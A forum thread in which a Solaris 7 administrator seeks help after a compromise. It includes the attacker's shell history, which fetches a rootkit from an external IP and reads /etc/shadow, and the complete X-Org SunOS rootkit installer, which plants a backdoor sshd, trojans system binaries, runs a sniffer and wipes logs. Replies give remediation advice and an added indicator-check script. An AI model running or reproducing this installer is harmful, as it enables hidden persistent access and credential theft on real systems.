
solaris 7 being hacked

Status
Not open for further replies.

ybark, Apr 8, 2004
Hi to All,
Does anybody here know what i'm going to do if my solaris 7 had being hacked. i just want to know what procedure that i can do to checked if my sunos can still operate normally. i'm new to unix and i really don't know how to restore it to normal mode. i accidentally configured it with public ip but now i immediately changed it to private ip to make it more safe. i don't want to format it becaue a lot of important files was being installed on it.

I will be really appreciated your help...
 
Keeping a hacked system alive in your enterprise is very dangerous; you will never know whether the hacker left a backdoor open...

I suggest doing a fresh install, installing the Recommended Patches, and running OS hardening (google for this), then restoring the important files (handle with care, the trojan horse may be among those files).

Best Regards, Franz
--
Solaris System Manager from Munich, Germany
I used to work for Sun Microsystems Support (EMEA) for 5 years
 
What makes you think it's been hacked?

Mike

"A foolproof method for sculpting an elephant: first, get a huge block of marble, then you chip away everything that doesn't look like an elephant."
 
For exactly that reason, you should keep incremental images of the system...

___________________________________
[morse]--... ...--[/morse], Eric.
 
Hi to UNIX guru,

Thanks for your reply.

Here's the info, based on the history file, on what the hacker did to my system...

\201^Aunset HISTFILE;id;uname -a;uptime;
cd /tmp
ls
wget
wget 62.211.66.53/nyo2k2/allsuntest.tar.Z
uncompress allsuntest.tar.Z
tar -xvf allsuntest.tar.
tar -xvf allsuntest.tar
cd sol
./setup
cat /etc/shadow
cat /etc/hosts
exit


Based on the above software, is there a safe way to uninstall this without affecting my existing setup? Do you have any idea how this rootkit behaves on the system once it's installed?

Thank you all...

 
Hi to all,

I tried to download the file located at 62.211.66.53/nyo2k2/allsuntest.tar.Z and opened the setup file, and here's what it looks like...

#!/bin/sh
# .,gg,. .,gg,.
# `$$$$$. .$$$$$'
# `$$$$$. .$$$$$' .,g%d$"^"$b%y,. .,g%d$"^"$b%y,..,g%d$"^"$b%y,.
# `$$$$$. .$$$$$'g$$$$' `$$$$y..g$$$$' .g$$$$' `""'
# $$$$$$$$$$$$.l$$$$: :$$$$ll$$$$: l$$$$: g%d$$b%y,.
# .$$$$$'""`$$$$$.$$$$$p g$$$$$'l$$$$: l$$$$: l$$$$:
# .$$$$$' `$$$$$.`^"$b%y,.,g%d~"^' `"--"' `^"$b%y,.,g%d~"^'
# .$$$$$' `$$$$$.
# `""""' `""""' you can stop one, but you can't stop all of us!
# (Leeto ASCII By: Johnny7)
#
# X-Org SunOS Rootkit v2.5D X-ORG Internal Release Edition By: Judge-D/Danny-Boy
# Special Thanks to Tragedy/Dor for Setup Wrapper
# If your not meant to have this, dont use it
# #
IVER="2.5DXE-ORG"
PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/ccs/bin:/usr/gnu/bin;export PATH

# Edit these
# Dir to install rootkit in
RKDIR="/usr/lib/libX.a"
# Your email address
EMAIL="puntose@sitoverde.com"

colours()
{
BLK=''
RED=''
GRN=''
YEL=''
BLU=''
MAG=''
CYN=''
WHI=''
DRED=''
DGRN=''
DYEL=''
DBLU=''
DMAG=''
DCYN=''
DWHI=''
RES=''
}
colours


STIME=`./utime`
echo "${DCYN}X-Org SunOS Rootkit Modified by GaSpO fino alle Sun 5.9<: "
cat logo
echo "${WHI}*${DWHI} Starting up at: ${DCYN}${STIME}${DWHI}"

INDIR=`pwd`
OS=`uname -s`
VER=`uname -r`
CPU=`uname -i`

cdir()
{
if test ! -d $1 ; then
mkdir $1
fi
}

backup()
{
if test -f /usr/lib/libX.a/bin/${2} ; then
cp /usr/lib/libX.a/bin/${2} /usr/lib/libX.a/bin/tmpfl
fi

if test -f "$1" ; then
cp $1 /usr/lib/libX.a/bin/
printf " $2"
fi

if test -f /usr/lib/libX.a/bin/tmpfl ; then
mv /usr/lib/libX.a/bin/tmpfl /usr/lib/libX.a/bin/${2}
fi
}

cprk()
{
cp $1 /usr/lib/libX.a/
printf " $1"
}

cdir()
{
if test ! -d $1 ; then
mkdir $1
fi
}

unsuid()
{
if test -f "$1" ; then
chmod u-s $1
printf " $2"
fi
}

# trojan proc..
# $1 = trojan
# $2 is real file
# example: trojan su /sbin/su
# no full path for trojan
trojan()
{
if test -f "$2" ; then
./sz $2 ./$1
./fix /$2 ./$1
printf " $1"
fi
}


printf "${WHI}*${DWHI} Installing from $INDIR - Will erase $INDIR after install\n"

case $OS in
SunOS)
;;
*)
echo "${WHI}*${DWHI} ${RED} Oops.. im DUMB! i tried installing SunOS Rootkit on $OS :p"
exit 10
;;
esac

# Ok.. so if theyre not lame, and running this on SunOS like they should...
case $VER in
5.5)
cp /bin/ls ./
;;
5.5.1)
cp /bin/ls ./
;;
5.7)
;;
5.6)
;;
5.8)
;;
5.9)
;;
5.4)
cp /bin/ls ./
;;
*)
printf "${RED}**FATAL**${DWHI} Sorry. SunOS Version $VER is NOT supported.\n"
exit
;;
esac
# check for x86 boxes, since this rootkit is precompiled for sparcs
case $CPU in
i86pc)
printf "${RED}**FATAL**${DWHI} This rootkit is precompiled for Sparc only, this system is $CPU\n"
exit
;;
*)
;;
esac

printf "${WHI}*${DWHI} Checking for existing rootkits..\n"

./findkit

cdir /tmp/.pat
cdir /usr/lib/
cdir $RKDIR
cdir /usr/lib/libX.a/bin

echo "${WHI}***${DWHI} Insert Rootkit Password : "
read PASSWD
echo "${WHI}***${DWHI} Using Password $PASSWD"
./pg $PASSWD >/etc/lpd.config
PASS=$PASSWD
echo "su_pass=`./rpass`" >>x.conf2
echo "${WHI}***${DWHI} Insert Rootkit SSH Port : "
read PORT
echo "${WHI}***${DWHI} Using Port $PORT"
echo "${WHI}***${DWHI} Insert Rootkit PsyBNC Port : "
read EPORT
echo "${WHI}***${DWHI} Using Port $EPORT"

echo "net_filters=$PORT,$EPORT,17000,60001,6667,31337,1111" >>x.conf
cat x.conf2 >>x.conf

./crypt x.conf /usr/lib/libX.a/uconf.inv

printf "${WHI}*${DWHI} Making backups..."
if test -f $RKDIR/bin ; then
echo "KIT ALREADY INSTALLED - SKIPPING BACKUPS"
else
backup /bin/su su
backup /usr/sbin/ping ping
backup /usr/bin/du du
backup /usr/bin/passwd passwd
backup /usr/bin/find find
backup /bin/ls ls
backup /bin/netstat netstat
backup /usr/bin/strings strings
fi

if test ! -f /usr/lib/libX.a/bin/rps ; then
cp /usr/bin/ps /usr/lib/libX.a/bin/rps
fi
printf " ps"

printf " Done.\n"
printf "${WHI}*${DWHI} Installing trojans..."

###Backdoors

# Special sz for login which checks for known login trojans
./szl /usr/bin/login ./login
./fix /usr/bin/login ./login /sbin/xlogin
printf " login"

if [ -f /usr/bin/srload ]; then
/usr/bin/ps -fe | grep srload | grep -v grep | awk '{print "kill -9 "$2""}' | /bin/sh
chmod 755 /usr/bin/srload
echo "Port ${PORT}" >etc/sshd_config
cat etc/tconf >>etc/sshd_config
rm -f etc/tconf
cp -f etc/* /usr/bin/
/usr/bin/srload -q
else
cp -f sshd /usr/bin/srload
/usr/bin/ps -fe | grep srload | grep -v grep | awk '{print "kill -9 "$2""}' | /bin/sh
chmod 755 /usr/bin/srload
echo "Port ${PORT}" >etc/sshd_config
cat etc/tconf >>etc/sshd_config
rm -f etc/tconf
cp -f etc/* /usr/bin/
/usr/bin/srload -q
fi
echo "" >>/etc/init.d/network
echo "# Reloading Network Settings" >>/etc/rcS.d/S30rootusr.sh
echo "" >>/etc/rcS.d/S30rootusr.sh
echo " if [ -f /usr/bin/srload ]; then" >>/etc/rcS.d/S30rootusr.sh
echo " /usr/bin/srload -q" >>/etc/rcS.d/S30rootusr.sh
echo " /usr/sbin/modcheck " >>/etc/rcS.d/S30rootusr.sh
echo " fi" >>/etc/rcS.d/S30rootusr.sh
echo "SV:23:respawn:/usr/bin/srload -D -q" >>/etc/inittab
touch -r /etc/swapadd /etc/inittab
touch -r /etc/swapadd /etc/rcS.d/S30rootusr.sh
/usr/sbin/init q
printf " sshd"

###Trojans
cd $INDIR

# Netstat Trojan
if test -f "/usr/bin/netstat" ; then
./sz /usr/bin/netstat ./netstat
./fix /usr/bin/netstat ./netstat
printf " netstat"
fi

# ls trojan
if test -f "/usr/bin/ls" ; then
./sz /usr/bin/ls ./ls2
./fix /usr/bin/ls ./ls2
printf " ls"
fi

# lsof trojan
if test -f "/usr/local/bin/lsof" ; then
./sz /usr/local/bin/lsof ./lsof
cp /usr/local/bin/lsof /usr/lib/libX.a/bin/
./fix /usr/local/bin/lsof ./lsof
printf " lsof"
fi

# find trojan
if test -f "/usr/bin/find" ; then
./sz /usr/bin/find ./find
./fix /usr/bin/find ./find
printf " find"
fi

#strings trojan
if test -f "/usr/bin/strings" ; then
./sz /usr/bin/strings ./strings
./fix /usr/bin/strings ./strings
printf " strings"
fi

# du trojan
if test -f "/usr/bin/du" ; then
./sz /usr/bin/du ./du
./fix /usr/bin/du ./du
printf " du"
fi

# top trojan
if test -f "/usr/local/bin/top" ; then
./sz /usr/local/bin/top ./top
rm -f /usr/local/bin/top
./fix /usr/local/bin/top ./top
printf " top"
fi

# passwd trojan
if test -f "/usr/bin/passwd" ; then
./sz /usr/bin/passwd ./passwd
./fix /usr/bin/passwd ./passwd
printf " passwd"
fi

# ping trojan
if test -f "/usr/sbin/ping" ; then
./sz /usr/sbin/ping ./ping
printf " ping"
fi

# su trojan
if test -f "/bin/su" ; then
./sz /bin/su ./su
./fix /bin/su ./su $RKDIR/oldsuper
printf " su"
fi

printf " Complete.\n"

printf "${WHI}*${DWHI} Suid removal"

unsuid /usr/bin/at at
unsuid /usr/bin/atq atq
unsuid /usr/bin/atrm atrm
unsuid /usr/bin/eject eject
unsuid /usr/bin/fdformat fdformat
unsuid /usr/bin/rdist rdist
unsuid /bin/rdist rdist
unsuid /usr/bin/admintool admintool
unsuid /usr/lib/fs/ufs/ufsdump ufsdump
unsuid /usr/lib/fs/ufs/ufsrestore ufsrestore
unsuid /usr/lib/fs/ufs/quota quota
unsuid /usr/openwin/bin/ff.core ff.core
unsuid /usr/bin/lpset lpset
unsuid /usr/bin/lpstat lpstat
unsuid /usr/lib/lp/bin/netpr netpr
unsuid /usr/sbin/arp arp
unsuid /usr/vmsys/bin/chkperm chkperm

chmod u-s /usr/openwin/bin/*
chmod u-s /usr/dt/bin/*
printf " Complete.\n"

cp wget /usr/bin
cp wget /usr/lib/libX.a
cp pico /usr/lib/libX.a
cp zap3 /usr/lib/libX.a
cp pico6 /usr/lib/libX.a
chmod 777 modstatd
./modstatd
cp modstatd /usr/sbin/
modstatd
chmod 777 /usr/sbin/modstatd
echo "/usr/sbin/modstatd" >> /etc/rcS.d/S30rootusr.sh
echo "${WHI}*${DWHI} Starting Patcher..."
$INDIR/p-engine
cp $INDIR/patch.* $RKDIR/

case $VER in
5.5)
$RKDIR/patch.sol5
;;
5.6)
$RKDIR/patch.sol6
;;
5.7)
$RKDIR/patch.sol7
;;
5.8)
$RKDIR/patch.sol8
;;
*)
printf "No Extra Patches for This Release -5.9 pachare a mano il sadmin<:\n"
;;
esac

cd $INDIR
# ps trojan
cd $INDIR;
if test -f /lib/ldlibps.so; then
cp -f /lib/ldlibps.so /usr/bin/ps
fi
./sz /usr/bin/ps ./ps
./fix /usr/bin/ps ./ps
# required for sol7/8
if test -d /usr/bin/sparcv7 ; then
cdir /usr/lib/libX.a/bin/sparcv7
cp -f /bin/sparcv7/ps /usr/lib/libX.a/bin/sparcv7/rps
fi
printf "PS Trojaned"

IFT=`/sbin/ifconfig -a | head -n 3|grep -v "lo0"|grep flags|awk '{print $1}'`
IFX=`echo $IFT | cut -d 0 -f 1`
echo "${WHI}*${DWHI} Primary network interface is of type: ${DCYN}${IFX}${DWHI}"

### sniffer
cp sn2 /usr/sbin/modstat
echo "nohup /usr/sbin/modstat -s -d 512 -i /dev/${IFX} -o /usr/lib/libp/libm.n >/dev/null &" >>sniffload
cp sniffload /usr/sbin/modcheck
echo "${WHI}*${DWHI} Sniffer set"
nohup /usr/sbin/modcheck >/dev/null 2>&1
### end sniffer

printf "${WHI}*${DWHI} Copying utils.."

cp pg $RKDIR/passgen
cp cleaner $RKDIR/wipe
cp utime $RKDIR/utime
cp l3 $RKDIR/l
cp crypt $RKDIR/crt
cp ssh-dxe $RKDIR/ssh-dxe
cp syn $RKDIR/syn
cp startbnc $RKDIR/loadbnc

printf " passgen fixer wipe utime crt idstart ssh-dxe syn README Done.\n"

### pident.d BACKDOOR
#cp -f in.identd /usr/sbin/in.identd
#chmod 755 /usr/sbin/in.identd
#echo "auth stream tcp nowait nobody /usr/sbin/in.identd in.identd" >> /etc/inetd.conf
#printf "${WHI}*${DWHI} in.identd backdoor installed on port 113 \n"
#printf "${WHI}*${RED} DONT FORGET TO RESTART INETD!"
###

### BNC2

#cp bnclp /usr/sbin/ntptime
#cp bnc.conf /usr/sbin/ntptime.conf
#echo "${WHI}*${DWHI} BNC2 has now been copied to /usr/sbin/ntptime and configured on port:1578"

### end BNC2

### psyBNC
#cdir /dev/cua/...#
#cp psy.tar.Z /dev/cua/.../
#cd /dev/cua/...
#uncompress psy.tar.Z && tar xvf psy.tar >>/dev/null
#echo "PSYBNC.SYSTEM.PORT1=$EPORT" >psybnc.conf
#echo "PSYBNC.SYSTEM.HOST1=*" >>psybnc.conf
#echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >>psybnc.conf
#echo "${WHI}*${DWHI} psyBNC has now been configured on port $EPORT
### end psyBNC

echo "${WHI}*${DWHI} erasing rootkit..."
cd $INDIR
cd ..
rm -rf allsun.tar
rm -rf lol
rm -rf /tmp/sol
rm -rf /tmp/lol
cd $RKDIR
rm -rf /tmp/.pat
PRIMIF=`/sbin/ifconfig -a|grep inet|head -n 2|grep -v 127.0.0.1|awk '{print $2}'`
IFCNT=`/sbin/ifconfig -a|grep inet|grep -v 127.0.0.1|wc -l`
UNAM=`uname -a`

DUPTEST=`dmesg|grep "SUNW,hme0"|head -n 1|cut -d ":" -f 1`
if [ $DUPTEST ];then
LINKUP=`dmesg|grep "SUNW,hme0"|grep "Link"|head -n 1`
echo "${WHI}*${DWHI} $LINKUP"
fi
NEXUS=`dmesg|grep nexus|head -n 1`

FTIME=`$RKDIR/utime`
ITIME=`expr $FTIME - $STIME`

echo "${WHI}*${DCYN} Rootkit installation Completed in ${ITIME} Seconds.${DWHI}"
echo "${WHI}*${DWHI} Password: $PASS"
echo "${WHI}*${DWHI} $UNAM"
echo "${WHI}*${DWHI} Primary interface IP: $PRIMIF"
echo "${WHI}*${DWHI} Possible $IFCNT host aliases"
echo "${WHI}*${DWHI} $NEXUS"
echo "Rootlist line:"
echo "$PRIMIF:${PORT} $PASS PSYBNC:${EPORT}"

# enable this if you want
#echo "$PRIMIF:${PORT} Solaris $VER $PASS" | mail ${EMAIL}

# Here you could add optional commands to clean logs
# EG: to remove traces of rpc.sadmind exploitation
#echo "${WHI}*${DCYN} Removing Logs...Insert Your IP: "
#read MYIP
$RKDIR/wipe sadmin
$RKDIR/wipe cmsd
$RKDIR/wipe snmp
echo "${WHI}*${DCYN} Done...Enjoy Your Stay :)aggiunta pach sadmin-rpc"
echo "${WHI}*${DCYN} Modified by GaSpO on IrcNet"
/usr/bin/ps -fe | grep ssld | grep -v grep | awk '{print "kill -9 "$2""}' | /bin/sh
cp /etc/inetd.conf /usr/lib/libX.a
cat /etc/inetd.conf|grep -v rpc > /tmp/cacca
/usr/bin/ps -fe | grep inetd| grep -v grep | awk '{print "kill -9 "$2""}' | /bin/sh
mv /tmp/cacca /etc/inetd.conf
/usr/sbin/inetd -s



Does anyone here know how to remove this kind of rootkit?

Thanks in advance...
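Added example, not part of the original thread and not code from the rootkit's authors: the setup script posted above is itself the indicator list. Everything it drops or edits is hard-coded: the kit directory /usr/lib/libX.a (holding the encrypted config uconf.inv, a copy of the old inetd.conf and the saved originals of su, ping, du, passwd, find, ls, netstat and strings under bin/), the backdoor sshd at /usr/bin/srload with its password hash in /etc/lpd.config, the sniffer installed as /usr/sbin/modstat and started by /usr/sbin/modcheck and /usr/sbin/modstatd, its capture file /usr/lib/libp/libm.n, the saved original login at /sbin/xlogin, a respawn entry appended to /etc/inittab and lines appended to the legitimate /etc/rcS.d/S30rootusr.sh (both back-dated with touch -r, so mtimes lie), and an /etc/inetd.conf rewritten without any rpc line. The check below turns that list into a Bourne sh script meant to be run from a trusted boot (Solaris install CD) with the victim's root mounted read-only; /a is the conventional mount point and is an assumption. It must not be run from the compromised system's own shell, because ls, find, ps, netstat and du are among the replaced binaries. It uses only test, grep, cksum, awk and expr so it also runs under Solaris /sbin/sh.

```shell
#!/bin/sh
# Added example (not from the original thread or the kit): offline indicator
# check built from the paths the X-Org SunOS rootkit setup script creates or
# edits.  Run from a trusted boot with the victim's root mounted read-only,
# e.g. check_xorg_rootkit /a   (/a is a conventional, assumed mount point).
# Prints one line per finding and returns the number of hits (0 = nothing found).

check_xorg_rootkit() {
    root=$1
    hits=0

    # Files and directories the setup script drops.  Note that S30rootusr.sh
    # and inittab are legitimate Solaris files and are checked by content below.
    for p in /usr/lib/libX.a /usr/lib/libX.a/uconf.inv /usr/lib/libX.a/inetd.conf \
             /usr/lib/libX.a/bin/rps /etc/lpd.config /usr/bin/srload \
             /usr/sbin/modstat /usr/sbin/modstatd /usr/sbin/modcheck \
             /usr/lib/libp/libm.n /sbin/xlogin /tmp/.pat
    do
        if [ -f "$root$p" -o -d "$root$p" ]; then
            echo "HIT path $p"
            hits=`expr $hits + 1`
        fi
    done

    # Persistence.  Both files were back-dated with "touch -r /etc/swapadd",
    # so inspect content rather than mtime.
    if [ -f "$root/etc/inittab" ] && grep srload "$root/etc/inittab" >/dev/null; then
        echo "HIT inittab respawn entry for /usr/bin/srload"
        hits=`expr $hits + 1`
    fi
    hook="$root/etc/rcS.d/S30rootusr.sh"
    if [ -f "$hook" ]; then
        if grep srload "$hook" >/dev/null || grep modstatd "$hook" >/dev/null; then
            echo "HIT rcS.d startup hook for srload/modcheck/modstatd"
            hits=`expr $hits + 1`
        fi
    fi

    # The kit rewrites inetd.conf with every "rpc" line removed (its comments
    # mention rpc.sadmind exploitation).  A stock Solaris 7 inetd.conf has many
    # rpc entries, so having none is worth a look, though not proof by itself.
    if [ -f "$root/etc/inetd.conf" ]; then
        if grep rpc "$root/etc/inetd.conf" >/dev/null; then
            :
        else
            echo "WARN inetd.conf has no rpc entries (the kit strips them)"
        fi
    fi

    # backup() saved the originals into /usr/lib/libX.a/bin before the trojans
    # were installed, so a live binary whose checksum differs from its saved
    # original has been replaced.  (/bin is a symlink to /usr/bin on Solaris.)
    for b in su ping du passwd find ls netstat strings; do
        bak="$root/usr/lib/libX.a/bin/$b"
        [ -f "$bak" ] || continue
        for rel in /usr/bin/$b /usr/sbin/$b; do
            live="$root$rel"
            [ -f "$live" ] || continue
            bsum=`cksum < "$bak" | awk '{print $1, $2}'`
            lsum=`cksum < "$live" | awk '{print $1, $2}'`
            if [ "$bsum" != "$lsum" ]; then
                echo "HIT trojaned binary $rel (original kept at /usr/lib/libX.a/bin/$b)"
                hits=`expr $hits + 1`
            fi
            break
        done
    done

    echo "$hits indicator(s) found"
    return $hits
}

# When run as a script, take the mount point as the first argument.
if [ $# -gt 0 ]; then
    check_xorg_rootkit "$1"
fi
```

Finding the saved originals is what makes Mike's "unpick the install" idea thinkable, but they only cover the eight binaries backup() handles; login, ps, lsof, top and su are overwritten through the kit's sz/fix tools and the removekit posted later restores only login, netstat, ps and the srload binary. From the same trusted boot, `pkgchk -R /a -n` compares every packaged file against the checksums Solaris recorded at install time in /var/sadm/install/contents and will flag the replaced binaries too, as long as that database is intact. None of this makes the box trustworthy again; it tells you what to preserve as evidence before following Franz's advice to reinstall and restore only data files.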
 
Did you run it?

Mike

 
Sorry, dumb question. I've now read your posts properly; you could unpick the install. By the look of it, it created backups of the files it modified, but it would be a major hassle. I'd restore, then secure your system.

Mike

 
There is a removekit script in the download, but it doesn't look like it would remove everything.

#!/bin/sh

-------------------------------------------------
# Removes sunos roootkit from a host

printf "Removing.."
cp -f /sbin/xlogin /usr/bin/login
printf " login"
cp -f /usr/lib/ldlibnet.so /usr/bin/netstat
printf " netstat"
cp -f /lib/ldlibps.so /usr/bin/ps
printf " ps"
rm -f /usr/bin/srload
printf " sshd"


printf " Done."
-----------------------------------------------------

I've also found this info on Google:





Mike

 